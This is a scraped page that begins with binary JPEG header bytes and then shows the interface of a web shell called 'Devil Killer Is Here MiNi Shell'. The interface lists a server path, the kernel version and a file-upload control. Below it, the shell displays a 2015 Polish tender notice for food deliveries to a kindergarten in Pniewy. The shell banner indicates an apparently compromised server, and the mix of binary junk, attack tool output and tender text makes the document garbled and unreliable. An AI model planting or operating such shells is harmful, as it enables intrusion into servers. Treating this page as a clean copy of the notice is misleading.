JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150806/200742-N-2015.html

<p class="kh_header"><b>Pniewy: Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach</b><br>
<b>Numer ogłoszenia: 200742 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole "Miś" , ul. Dworcowa 23, 62-045 Pniewy, woj. wielkopolskie, tel. 061 2911216.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mis.pniewy.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Gminy Pniewy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Tabela  A  WARZYWA I OWOCE
Nazwa artykułu	Jednostka miary Ilość Marchew luzem kg 60 Pietruszka korzeń kg50 Rzodkiewka świeża p. pęczek 50 Sałata szt. 50 Sałata lodowa szt.50 Por korzeń kg30 Cebula biała kg80 Buraki czerwone kg40 Seler korzeń kg60 Jabłka lobo kg100 Mandarynki kg80 Kiwi  szt.200 Ziemniaki jadalne kg   2000 Kapusta czerwona świeża  kg 80 Kapusta pekińska  szt. 50 Kalafior świeży  szt.60 Pomidory luz kg   60 Ogórki szklarniowe kg60 Ogórki kwaszone luz kg  50 Kapusta kwaszona kg60  Kapusta biała główka kg kg  40  Pieczarki świeże luz kg40 Banan kg100 Gruszka kg60 Papryka świeża  kg30 Szczypior pęczek100 Koper świeży pęczek100 Natka pietruszki p. pęczek 100 Winogrono jasne kg100 cytryna kg 10					
Tabela B  MIĘSO I PRZETWORY         
Nazwa artykułu	Jedn. miary Kości od schabu kg 200 Ogonówka wieprzowa wędzona  kg 120 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg80 Szynka wieprzowa wędzona got. kg90 Mięso wieprzowe mielone drobne kg80 Mielonka zapiekana wieprzowa kg80 Mięso gulaszowe wieprzowe kg 100 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg60 Porcje rosołowe z kurczaka kg100  Kiełbasa wieprzowa gruba kg160 Udka z kurczaka kg80 Karkówka b k wieprzowa kg90 Kaszanka kg50 Kurczak świeży patroszony do 2kg kg50 Wątróbka wieprzowa kg60 Parówka drobiowa cienka kg90 Kotlet schabowy b k kg 40 Pasztet drobiowy kg 60 Smalec luz kg30					
Tabela C  MROŻONKI	
Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5  kg op.szt.50 Truskawki mrożone  2,5  kg op.. szt. 60 Mieszanka warzywna paski 2,5  kg op. szt.80 Brokuły mrożone 2,5  kg op.szt.60 Zupa kalafiorowa, 2,5  kg op.szt.60 Zupa jarzynowa, 2,5  kg op.szt.50 Kalafior, 2,5  kg op.szt.50 Pyzy drożdżowe op.9szt szt.300 Groszek zielony, 2,5  kg op.szt.50 Marchew z groszkiem, 2,5  kg op.szt.50  Wiśnie drążone 2,5  kg op.szt.20 Maliny 2,5 kg szt.20 Jagody 2,5 kg szt.20 Kompotowe 2,5kg op.szt.100					
Tabela D   PRZETWORY MĄCZNE, INNE
Lp. Nazwa artykułu Jednostka miary Ilość Cena Mąka pszenna 500 kg150 Ryż długoziarnisty  kg80 Kawa zbożowa (typu inka)150 g szt.20 Kasza jęczmienna średnia luz kg30 Kasza manna 1kg kg20 Kisiel różne smaki 40 g szt.300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.20 Cukier biały kryształ, paczkowany 1kg szt. 500 Syrop wieloowocowy, wysokosłodzony 1l szt. 30 Napoje różne smaki 0.20l kartonik szt. 800 Krem do smarowania orzech.-czek. 230 g szt.100 Miód pszczeli nektarowy lipowy 0,4 kg szt.100 Dżemy różne smaki 0,30 l  wysokosłodzony szt.80 Kakao naturalne 150 g op.szt.10 Majonez dekoracyjny 0,7 kg op. szt.50 Musztarda sarepska 0,9 kg op. szt. 20 Płatki owsiane 0,5 kg op. szt.50 Groch połówki luz kg30 Fasola sucha luz kg30 Koncentrat  pomidorowy 30% 0,9 l  szt.50 Galaretka do ciast różne smaki  0,75g szt. 240 Proszek do pieczenia 18g szt.30 Drożdże piekarskie 100g szt.40 Ketchup łagodny 500g szt.20 Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg	szt. 60 Liść laurowy 10g szt.30	Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt.40 Kwasek cytrynowy spożywczy 20g szt.40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml szt.50 Groszek zielony puszka 400ml szt.40 Przecier ogórkowy 0,5 kg op. szt.30 Cynamon 20 g szt.20 Ziele angielskie 15gszt.30 Mąka ziemniaczana 1kg kg5 Olej roślinny, 1l szt.120 Szprot w pomidorach puszka  170g op. szt.60 Paprykarz szczecinecki 135g op. szt.40 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l szt.  200 Imbir 20 g szt.30 Czosnek granulowany 20 g szt.30 Bazylia 10 g szt.30 Oregano 10 g szt.30 herbaty ziołowe 4x30 g - 20 torebek szt.30 ryż ciemny kg30 kasza gryczana kg 30 zioła prowasalskie 10 g szt. 30 Herbata granulowana 100g op. szt. 140  Papryka słodka syp. 0,5kg szt. 2  Pieprz mielony 0,5 kg szt.4 Przyprawa w płynie 1l szt.10					
Tabela E   SŁODYCZE
Cukierki mieszane czekolad 2,5kg op. szt.5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt.10 Wafle kakaowe  b czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g	szt. 280  Figurki czekoladowe - Mikołaje 80g szt.300 Wafle śmietankowe luz kg30					
Tabela F  PIECZYWO
Chleb baltonowski 0,6 kg krojony szt. 1600 Chleb razowy 0,5 kg,litewski krojony szt.400 Bułka firmowa  0,06 kg szt.3500 Bułka maślana 0,05 kg szt.2500 Chleb pszenny 0,35 kg szt.600 Pączki szt.600 Bułka tarta 1 kg szt.40 Babka okrągła średnia 0,5kg szt.120 Drożdżówki szt.500					
Tabela G     NABIAŁ
Śmietana 12% słodka 0,5l  szt.130 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op.szt.400 Ser homogenizowany  tłusty 200 g szt.50 Ser salami luzkg60 Sery topione bloczki 100g op. różne smakiszt.180 Jajka kurze świeże średnie szt.2000 Mleko 2% karton 1 l op.szt.1200Krążek mix  typu Hochlland 140g trójkątyszt.80 Ser kanapkowy 150g op.szt.150 Ser królewski luzkg50 Maślanka naturalna, karton  1l  PL28101601 WEszt.50 Jogurt naturalny 0,45l op.szt.50 Jogurt smakowy 115gszt.1200 Śmietanka kremowa 30% 0,5lszt.30Margaryna zwykła 250g szt.220 Masło śmietankowe 200g op. zaw. 86%tł.szt.1500					
Tabela H   MAKARONY I PRZYPRAWY
Sos pieczeniowy 3 kg. op. szt. 5	Majeranek 0,30kg op.szt. 20 Zupa żurek 1 kg. op. szt. 4 Zupa barszcz 1 kg op. szt. 4 Makaron drobny gwiazdki 100% pszenicy Durum 5kg op. szt. 60 Makaron kokardki, 100% pszenicy Durum 5kg op.szt.50 Makaron nitki 100% pszenicy Durum 5kg op.szt.6 Makaron rurki 100% pszenicy Durum 5kg op.szt.40 Makaron koła 100% pszenicy Durum 5kg op.szt.40 Makaron łazanki 100% pszenicy Durum 3kg op. szt.12 Makaron świderki 100% pszenicy Durum 5kg op.szt.30				
Tabela  I   RYBY
 Ryby mrożone filet z Pangi kg op. kg 150 Ryby mrożone filet z mintaja kg op. kg 150 Ryby wiadro płaty śledziowe ocet 2kg.op. kg 30..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Tabela  A  WARZYWA I OWOCE
Nazwa artykułu	Jednostka miary Ilość Marchew luzem kg 60 Pietruszka korzeń kg50 Rzodkiewka świeża p. pęczek 50 Sałata szt. 50 Sałata lodowa szt.50 Por korzeń kg30 Cebula biała kg80 Buraki czerwone kg40 Seler korzeń kg60 Jabłka lobo kg100 Mandarynki kg80 Kiwi  szt.200 Ziemniaki jadalne kg   2000 Kapusta czerwona świeża  kg 80 Kapusta pekińska  szt. 50 Kalafior świeży  szt.60 Pomidory luz kg   60 Ogórki szklarniowe kg60 Ogórki kwaszone luz kg  50 Kapusta kwaszona kg60  Kapusta biała główka kg kg  40  Pieczarki świeże luz kg40 Banan kg100 Gruszka kg60 Papryka świeża  kg30 Szczypior pęczek100 Koper świeży pęczek100 Natka pietruszki p. pęczek 100 Winogrono jasne kg100 cytryna kg 10					
Tabela B  MIĘSO I PRZETWORY         
Nazwa artykułu	Jedn. miary Kości od schabu kg 200 Ogonówka wieprzowa wędzona  kg 120 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg80 Szynka wieprzowa wędzona got. kg90 Mięso wieprzowe mielone drobne kg80 Mielonka zapiekana wieprzowa kg80 Mięso gulaszowe wieprzowe kg 100 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg60 Porcje rosołowe z kurczaka kg100  Kiełbasa wieprzowa gruba kg160 Udka z kurczaka kg80 Karkówka b k wieprzowa kg90 Kaszanka kg50 Kurczak świeży patroszony do 2kg kg50 Wątróbka wieprzowa kg60 Parówka drobiowa cienka kg90 Kotlet schabowy b k kg 40 Pasztet drobiowy kg 60 Smalec luz kg30					
Tabela C  MROŻONKI	
Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5  kg op.szt.50 Truskawki mrożone  2,5  kg op.. szt. 60 Mieszanka warzywna paski 2,5  kg op. szt.80 Brokuły mrożone 2,5  kg op.szt.60 Zupa kalafiorowa, 2,5  kg op.szt.60 Zupa jarzynowa, 2,5  kg op.szt.50 Kalafior, 2,5  kg op.szt.50 Pyzy drożdżowe op.9szt szt.300 Groszek zielony, 2,5  kg op.szt.50 Marchew z groszkiem, 2,5  kg op.szt.50  Wiśnie drążone 2,5  kg op.szt.20 Maliny 2,5 kg szt.20 Jagody 2,5 kg szt.20 Kompotowe 2,5kg op.szt.100					
Tabela D   PRZETWORY MĄCZNE, INNE
Lp. Nazwa artykułu Jednostka miary Ilość Cena Mąka pszenna 500 kg150 Ryż długoziarnisty  kg80 Kawa zbożowa (typu inka)150 g szt.20 Kasza jęczmienna średnia luz kg30 Kasza manna 1kg kg20 Kisiel różne smaki 40 g szt.300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.20 Cukier biały kryształ, paczkowany 1kg szt. 500 Syrop wieloowocowy, wysokosłodzony 1l szt. 30 Napoje różne smaki 0.20l kartonik szt. 800 Krem do smarowania orzech.-czek. 230 g szt.100 Miód pszczeli nektarowy lipowy 0,4 kg szt.100 Dżemy różne smaki 0,30 l  wysokosłodzony szt.80 Kakao naturalne 150 g op.szt.10 Majonez dekoracyjny 0,7 kg op. szt.50 Musztarda sarepska 0,9 kg op. szt. 20 Płatki owsiane 0,5 kg op. szt.50 Groch połówki luz kg30 Fasola sucha luz kg30 Koncentrat  pomidorowy 30% 0,9 l  szt.50 Galaretka do ciast różne smaki  0,75g szt. 240 Proszek do pieczenia 18g szt.30 Drożdże piekarskie 100g szt.40 Ketchup łagodny 500g szt.20 Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg	szt. 60 Liść laurowy 10g szt.30	Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt.40 Kwasek cytrynowy spożywczy 20g szt.40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml szt.50 Groszek zielony puszka 400ml szt.40 Przecier ogórkowy 0,5 kg op. szt.30 Cynamon 20 g szt.20 Ziele angielskie 15gszt.30 Mąka ziemniaczana 1kg kg5 Olej roślinny, 1l szt.120 Szprot w pomidorach puszka  170g op. szt.60 Paprykarz szczecinecki 135g op. szt.40 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l szt.  200 Imbir 20 g szt.30 Czosnek granulowany 20 g szt.30 Bazylia 10 g szt.30 Oregano 10 g szt.30 herbaty ziołowe 4x30 g - 20 torebek szt.30 ryż ciemny kg30 kasza gryczana kg 30 zioła prowasalskie 10 g szt. 30 Herbata granulowana 100g op. szt. 140  Papryka słodka syp. 0,5kg szt. 2  Pieprz mielony 0,5 kg szt.4 Przyprawa w płynie 1l szt.10					
Tabela E   SŁODYCZE
Cukierki mieszane czekolad 2,5kg op. szt.5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt.10 Wafle kakaowe  b czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g	szt. 280  Figurki czekoladowe - Mikołaje 80g szt.300 Wafle śmietankowe luz kg30					
Tabela F  PIECZYWO
Chleb baltonowski 0,6 kg krojony szt. 1600 Chleb razowy 0,5 kg,litewski krojony szt.400 Bułka firmowa  0,06 kg szt.3500 Bułka maślana 0,05 kg szt.2500 Chleb pszenny 0,35 kg szt.600 Pączki szt.600 Bułka tarta 1 kg szt.40 Babka okrągła średnia 0,5kg szt.120 Drożdżówki szt.500					
Tabela G     NABIAŁ
Śmietana 12% słodka 0,5l  szt.130 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op.szt.400 Ser homogenizowany  tłusty 200 g szt.50 Ser salami luzkg60 Sery topione bloczki 100g op. różne smakiszt.180 Jajka kurze świeże średnie szt.2000 Mleko 2% karton 1 l op.szt.1200Krążek mix  typu Hochlland 140g trójkątyszt.80 Ser kanapkowy 150g op.szt.150 Ser królewski luzkg50 Maślanka naturalna, karton  1l  PL28101601 WEszt.50 Jogurt naturalny 0,45l op.szt.50 Jogurt smakowy 115gszt.1200 Śmietanka kremowa 30% 0,5lszt.30Margaryna zwykła 250g szt.220 Masło śmietankowe 200g op. zaw. 86%tł.szt.1500					
Tabela H   MAKARONY I PRZYPRAWY
Sos pieczeniowy 3 kg. op. szt. 5	Majeranek 0,30kg op.szt. 20 Zupa żurek 1 kg. op. szt. 4 Zupa barszcz 1 kg op. szt. 4 Makaron drobny gwiazdki 100% pszenicy Durum 5kg op. szt. 60 Makaron kokardki, 100% pszenicy Durum 5kg op.szt.50 Makaron nitki 100% pszenicy Durum 5kg op.szt.6 Makaron rurki 100% pszenicy Durum 5kg op.szt.40 Makaron koła 100% pszenicy Durum 5kg op.szt.40 Makaron łazanki 100% pszenicy Durum 3kg op. szt.12 Makaron świderki 100% pszenicy Durum 5kg op.szt.30				
Tabela  I   RYBY
 Ryby mrożone filet z Pangi kg op. kg 150 Ryby mrożone filet z mintaja kg op. kg 150 Ryby wiadro płaty śledziowe ocet 2kg.op. kg 30.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki wynikające z art. 22 ust 1 - 3 ustawy z dnia 29 stycznia 2004 PZP oraz nie podlegają wykluczeniu na podstawie art. 24 ust 1-2 ustawy, złożą wymagane i opisane w SIWZ oświadczenia i dokumenty. Informacja o oświadczeniach i dokumentach  jakie mają dostarczyć wykonawcy  w celu potwierdzenia spełnienia warunków udziału w postępowaniu. W celu potwierdzenia spełnienia warunków Oferenci zobowiązani są do przedstawienia w ofercie następujących dokumentów i oświadczeń: Wypełniony formularz oferty dla danej tabeli. Oświadczenie o spełnianiu warunków określonych  w art. 22 ust. 1 oraz art. 24 ust. 1-2 ustawy (załącznik nr 2), aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert  (oryginał lub kopia poświadczona za zgodność z oryginałem  przez wykonawcę). W przypadku występowania pełnomocnika należy dołączyć pełnomocnictwo dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lubinnych dokumentów. Dokumenty stanowiące załączniki wymagane przez niniejsze SIWZ muszą zostać wypełnione przez oferenta bez wyjątku ściśle według warunków i postanowień w nich zawartych - bez dokonywania żadnych zmian i uzupełnień. Miejsca wykropkowane przeznaczone do wypełnienia muszą zostać prawidłowo wypełnione.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mis.pniewy.wlkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miś w Pniewach
ul. Dworcowa 23
62-045 Pniewy
biuro Intendenta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2015 godzina 09:00, miejsce: Przedszkole Miś w Pniewach
ul. Dworcowa 23
62-045 Pniewy
biuro Dyrektora, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 17.09.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Tabela  A  WARZYWA I OWOCE.</p>
